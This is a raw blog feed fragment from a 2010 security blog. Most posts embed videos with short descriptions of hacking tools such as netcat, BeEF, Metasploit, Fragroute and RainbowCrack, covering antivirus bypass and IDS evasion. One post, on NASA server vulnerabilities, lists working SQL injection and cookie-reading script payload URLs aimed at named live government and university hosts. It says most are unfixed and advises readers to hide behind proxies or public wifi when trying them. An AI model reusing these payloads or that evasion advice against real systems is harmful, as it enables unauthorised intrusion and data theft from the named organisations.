href='http://pinoysecurity.blogspot.com/2010/03/remote-vnc-installation.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/137415497677041950'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/137415497677041950'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/remote-vnc-installation.html' title='Remote VNC  Installation'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-6565823267001310770</id><published>2010-03-12T20:10:00.000+08:00</published><updated>2010-04-01T13:22:40.633+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><title type='text'>Rainbow Cracking - MD2, MD4, MD5, SHA1,L1</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/w4ftT-hFhbE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/w4ftT-hFhbE&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;RainbowCrack&lt;/b&gt; is a computer program which generates rainbow tables to be used in password cracking. RainbowCrack differs from "conventional" brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically.&lt;sup class="reference" id="cite_ref-doc_0-0"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt; RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off &lt;a href="http://en.wikipedia.org/wiki/Cryptanalysis" title="Cryptanalysis"&gt;cryptanalysis&lt;/a&gt; attack which originated in Philippe Oechslin's Ophcrack.&lt;sup class="reference" id="cite_ref-doc_0-1"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;br /&gt;As RainbowCrack's purpose is to generate rainbow tables and not to crack passwords per-se, some organizations have endeavored to make RainbowCrack's rainbow tables available free over the internet.&lt;sup class="reference" id="cite_ref-1"&gt;&lt;span&gt;&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-6565823267001310770?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/6565823267001310770/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/rainbow-cracking-md2-md4-md5-sha1l1.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6565823267001310770'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/6565823267001310770'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/rainbow-cracking-md2-md4-md5-sha1l1.html' title='Rainbow Cracking - MD2, MD4, MD5, SHA1,L1'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3256543817346141522</id><published>2010-03-12T00:03:00.002+08:00</published><updated>2010-03-14T23:48:01.049+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Bypassing Firewalls'/><title type='text'>Bypassing Firewalls Using Reverse Telnet</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/UAMFnaEdTGo&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/UAMFnaEdTGo&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Netcat&lt;/b&gt; is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable “back-end” device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.&lt;br /&gt;In 2000 according to www.insecure.org &lt;b&gt;Netcat&lt;/b&gt; was voted the second most functional network security tool. Also, in 2003 and 2006 it gained fourth place in the same category. Netcat is often referred to as a "Swiss-army knife for TCP/IP." Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.&lt;br /&gt;According to http://nc110.sourceforge.net, some of netcat's major features are:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Outbound or inbound connections, TCP or UDP, to or from any ports&lt;/li&gt;&lt;li&gt;Full DNS forward/reverse checking, with appropriate warnings&lt;/li&gt;&lt;li&gt;Ability to use any local source port&lt;/li&gt;&lt;li&gt;Ability to use any locally-configured network source address&lt;/li&gt;&lt;li&gt;Built-in port-scanning capabilities, with randomization&lt;/li&gt;&lt;li&gt;Built-in loose source-routing capability&lt;/li&gt;&lt;li&gt;Can read command line arguments from standard input&lt;/li&gt;&lt;li&gt;Slow-send mode, one line every N seconds&lt;/li&gt;&lt;li&gt;Hex dump of transmitted and received data&lt;/li&gt;&lt;li&gt;Optional ability to let another program service established connections&lt;/li&gt;&lt;li&gt;Optional telnet-options responder&lt;/li&gt;&lt;li&gt;Featured tunneling mode which allows also special tunneling such as UDP to TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel.&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3256543817346141522?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3256543817346141522/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/bypassing-firewalls-using-reverse.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3256543817346141522'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3256543817346141522'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/bypassing-firewalls-using-reverse.html' title='Bypassing Firewalls Using Reverse Telnet'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5643590777215641606</id><published>2010-03-08T12:47:00.006+08:00</published><updated>2010-03-14T23:48:23.392+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Browser Exploitation'/><title type='text'>Browser Exploitation</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/4igZvLqEOD4&amp;hl=en_US&amp;fs=1&amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/4igZvLqEOD4&amp;hl=en_US&amp;fs=1&amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;BeEF is a web browser exploitation framework. This tool will demonstrate the collecting of zombie browsers and browser vulnerabilities in real-time. It provides a command and control interface which facilitates the targeting of individual or groups of zombie browsers.&lt;br /&gt;&amp;nbsp;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Main Features :&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process.&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Browser exploitation modules&lt;/li&gt;&lt;li&gt;Keystroke logging&lt;/li&gt;&lt;li&gt;Distributed Port Scanning&lt;/li&gt;&lt;li&gt;Integration with Metasploit via XML-RPC&lt;/li&gt;&lt;li&gt;Mozilla extension exploitation support&lt;/li&gt;&lt;li&gt;Tor detection&lt;/li&gt;&lt;li&gt;Browser functionality detection modules&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5643590777215641606?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5643590777215641606/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/browser-exploitation.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5643590777215641606'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5643590777215641606'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/browser-exploitation.html' title='Browser Exploitation'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-3830741900504958770</id><published>2010-03-04T21:59:00.001+08:00</published><updated>2010-03-26T11:26:38.234+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Steganography'/><title type='text'>How To Hide Files Inside Images</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/q6AQL55zMR4&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/q6AQL55zMR4&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Hiding files into another file is nothing new to the technically stealthy type however this trick will still prove useful in certain everyday situations. So with that I re-posted this classic video just to remind everyone the value of going back to one's roots. Enjoy :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-3830741900504958770?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/3830741900504958770/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/how-to-hide-files-inside-images.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3830741900504958770'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/3830741900504958770'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/03/how-to-hide-files-inside-images.html' title='How To Hide Files Inside Images'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5034035155296489695</id><published>2010-02-25T22:43:00.005+08:00</published><updated>2010-04-06T09:54:18.419+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Full Disclosure'/><title type='text'>NASA Servers "0-day" Vulnerabilities</title><content type='html'>After a series of SQL vulnerabilities last December 2009, the NASA website is on the security limelight again with another set of server vulnerabilities. I am aware that the agency itself has had budget issues lately and added the fact that they have a lot of servers to maintain on a daily basis, may have contributed to such negligence. However, all that should not be used as an excuse for the security oversight. After all, prevention such as input validation should not cost a single cent right?&lt;br /&gt;&lt;a href="http://www.dpbolvw.net/click-3795542-10408484"&gt;&lt;br /&gt;&lt;img alt="" border="0" height="112" src="http://www.awltovhc.com/image-3795542-10408484" width="230" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Cross-Site Scripting &lt;/b&gt;&lt;b&gt;/ SQL&lt;/b&gt;&lt;b&gt; :&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&amp;amp;node=0&amp;amp;instnname=0′AND+1/0;–&amp;amp;Submit=Search&lt;br /&gt;&lt;br /&gt;Following error is giving some precious information (I mean many times it is returning different IP address in “Remote Address”. These IP addresses can be of other error generating remote clients, there might be some serious flaw:&lt;br /&gt;&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/search.jsp?q=NOT&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/text-search/results.jsp?query=%22&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=OR&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/data-search/search.jsp?q=”&lt;br /&gt;etc.&lt;br /&gt;&lt;br /&gt;Check these results of this Error based SQL injection:&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=%27&amp;amp;node=1′%22;/*&amp;amp;instnname=-1;–&amp;amp;Submit=Search&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/ddlookup/data_dictionary_lookup.cfm?type=element&amp;amp;q=NOT&amp;amp;genclasstype=0′&amp;amp;sysclassid=0&lt;br /&gt;&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&amp;amp;node=1&amp;amp;instnname=%27%29+OR+1=0+OR+57=rand%28convert%28%27NUMERIC,%27||%28select+@@version%29%29%252b900000000000000000000000%29–&amp;amp;Submit=Search&lt;br /&gt;http://www-pds.jpl.nasa.gov/tools/phonebook/phonebook.cfm?search_field=&amp;amp;node=1&amp;amp;instnname=’)+OR+1=0+OR+57=rand(convert(‘NUMERIC,’||(select+@@version))%252b900000000000000000000000)–&amp;amp;Submit=Search&lt;br /&gt;————————————————————————————————————————————————–&lt;br /&gt;Error Executing Database Query.&lt;br /&gt;Syntax error during explicit conversion of VARCHAR value ‘ Adaptive Server Enterprise/12.5.1/EBF 11429/P/Linux Intel/Enterprise Linux/ase1251/1823/32-bit/OPT/Tue Sep 16 23:43:54 2003′ to a NUMERIC field.&lt;br /&gt;&lt;br /&gt;http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=&amp;amp;phase=&amp;amp;progyr=99&amp;amp;st=&amp;amp;center=&amp;amp;firm=’select+@@version–’&amp;amp;sort=&amp;amp;sort2=&amp;amp;rec_per_page=1&amp;amp;cur_page=-2&amp;amp;start_page=-9999&lt;br /&gt;&lt;br /&gt;http://sbir.nasa.gov/sbirweb/abstracts/search_result.jsp?program=SBIR&amp;amp;phase=&amp;amp;progyr=99st=center=firm=SBIR’or+1=utl_inaddr.get_host_address((select+concat(‘A’,count(username))+from+all_users))–’&amp;amp;sort=null&amp;amp;sort2=null&amp;amp;rec_per_page=100&amp;amp;cur_page=1&amp;amp;start_page=1&lt;br /&gt;&lt;br /&gt;http://e4eil01u.ecs.nasa.gov:22000/WebAccess/drill?attrib=home%3Cscript%3Ealert(‘XSS–vinnu’)%3C/script%3E&amp;amp;next=group&lt;br /&gt;&lt;br /&gt;http://www.igpp.ucla.edu/cgi-bin/ditdos?filter=GOPR_2001,HAL_,DS1_PEPE,DSPE&amp;amp;title=Comet&lt;script&gt;alert(‘XSS—\”vinnu\”‘)&lt;/script&gt;&lt;br /&gt;&lt;div&gt;————————————————————————————————————————————————&lt;/div&gt;http://directreadout.sci.gsfc.nasa.gov/index.cfm?section=home%22%3E%3Cscript%3Ealert(‘XSS–%5C%22vinnu%5C%22′)%3C/scrip &lt;br /&gt;&lt;div&gt;t%3E&amp;amp;page=news&lt;/div&gt;&lt;div&gt;&lt;/div&gt;http://ssd.jpl.nasa.gov/sbdb_help.cgi?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;i&gt;&lt;b&gt;Safety Reminders :&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div style="color: red;"&gt;&lt;br /&gt;&lt;/div&gt;1. The information above are for educational purposes only and should not be used for illegal purposes such as defacing, information theft, espionage, and the like.&lt;br /&gt;2. Most of the vulnerabilities above are not yet fixed by NASA, so take extra precaution if you have to check the live servers yourself such as using multiple proxies or simply use public internet access such as a "wifi hotspot".&lt;br /&gt;3. I have tried to notify the people in charge via email  before posting these vulnerabilities but no reply from them until now for 2 weeks already.&lt;br /&gt;4. Credits to Lox and Vinay.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5034035155296489695?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5034035155296489695/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/nasa-servers-0-day-vulnerability.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5034035155296489695'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5034035155296489695'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/nasa-servers-0-day-vulnerability.html' title='NASA Servers &quot;0-day&quot; Vulnerabilities'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-5169269497591622495</id><published>2010-02-22T20:14:00.001+08:00</published><updated>2010-03-26T12:23:48.090+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Metasploit Meterpreter Reverse EXE</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/CJk70Hw6ABg&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/CJk70Hw6ABg&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;The &lt;b&gt;Metasploit Project&lt;/b&gt; is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the &lt;b&gt;Metasploit Framework&lt;/b&gt;, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.&lt;br /&gt;The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.&lt;br /&gt;Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced&lt;sup class="reference" id="cite_ref-0"&gt; &lt;/sup&gt;that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.&lt;br /&gt;Like comparable commercial products such as Immunity's CANVAS or Core Security Technologies'&lt;sup class="reference" id="cite_ref-1"&gt;&lt;a href="http://en.wikipedia.org/wiki/Metasploit_Project#cite_note-1"&gt;&lt;/a&gt;&lt;/sup&gt; Core Impact, Metasploit can be used to test the vulnerability of computer systems in order to protect them, and it can be used to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.&lt;br /&gt;Metasploit's emerging position as the de facto vulnerability development framework has led in recent times to the release of software vulnerability advisories often accompanied by a third party Metasploit exploit module that highlights the exploitability, risk, and remediation of that particular bug.&lt;sup class="reference" id="cite_ref-VMwareNAT_2-0"&gt;&lt;a href="http://en.wikipedia.org/wiki/Metasploit_Project#cite_note-VMwareNAT-2"&gt;&lt;/a&gt;&lt;/sup&gt;&lt;sup class="reference" id="cite_ref-MOKB-11-11-2006_3-0"&gt;&lt;a href="http://en.wikipedia.org/wiki/Metasploit_Project#cite_note-MOKB-11-11-2006-3"&gt;&lt;/a&gt;&lt;/sup&gt; Metasploit 3.0 (Ruby language) is also beginning to include fuzzing tools, to discover software vulnerabilities in the first instance, rather than merely writing exploits for currently public bugs. This new avenue has been seen with the integration of the lorcon wireless (802.11) toolset into Metasploit 3.0 in November, 2006.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-5169269497591622495?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/5169269497591622495/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/metasploit-meterpreter-reverse-exe.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5169269497591622495'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/5169269497591622495'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/metasploit-meterpreter-reverse-exe.html' title='Metasploit Meterpreter Reverse EXE'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-1883063227697374483</id><published>2010-02-19T13:52:00.000+08:00</published><updated>2010-03-26T12:23:48.090+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Metasploit'/><title type='text'>Bypassing Anti-Virus Using Metasploit</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ScTCJ88rplU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ScTCJ88rplU&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="description"&gt;This video shows how to bypass anti virus tools utilizing the new tricks in Metasploit 3.2&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-1883063227697374483?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/1883063227697374483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/bypassing-anti-virus-using-metasploit.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1883063227697374483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/1883063227697374483'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/bypassing-anti-virus-using-metasploit.html' title='Bypassing Anti-Virus Using Metasploit'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-982171095137817677</id><published>2010-02-15T12:26:00.006+08:00</published><updated>2010-04-06T10:07:16.943+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fragroute'/><title type='text'>Fragroute</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/k7viy_NN8f4&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/k7viy_NN8f4&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;One basic technique is to split the attack payload into multiple small packets, so that the IDS must reassemble the packet stream to detect the attack. A simple way of splitting packets is by fragmenting them, but an adversary can also simply craft packets with small payloads. The 'whisker' evasion tool calls crafting packets with small payloads 'session splicing'.&lt;br /&gt;By itself, small packets will not evade any IDS that reassembles packet streams. However, small packets can be further modified in order to complicate reassembly and detection. One evasion technique is to pause between sending parts of the attack, hoping that the IDS will time out before the target computer does. A second evasion technique is to send the packets out of order, confusing simple packet re-assemblers but not the target computer.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5305311560066067589-982171095137817677?l=pinoysecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pinoysecurity.blogspot.com/feeds/982171095137817677/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/fragroute.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/982171095137817677'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5305311560066067589/posts/default/982171095137817677'/><link rel='alternate' type='text/html' href='http://pinoysecurity.blogspot.com/2010/02/fragroute.html' title='Fragroute'/><author><name>Val Buenaventura</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_vUW0F0UxPvk/S45WgdxFeSI/AAAAAAAAAJ0/YNWfwcul12w/S220/pinoysecurity.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5305311560066067589.post-4262981661577092505</id><published>2010-02-11T12:07:00.001+08:00</published><updated>2010-03-14T23:54:40.484+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hping'/><title type='text'>Hping</title><content type='html'>&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/AhP0JVjSGwM&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/AhP0JVjSGwM&amp;amp;hl=en_US&amp;amp;fs=1&amp;amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;hping&lt;/b&gt; is a free packet generator and analyzer for the TCP/IP protocol distributed by Salvatore Sanfilippo (also known as 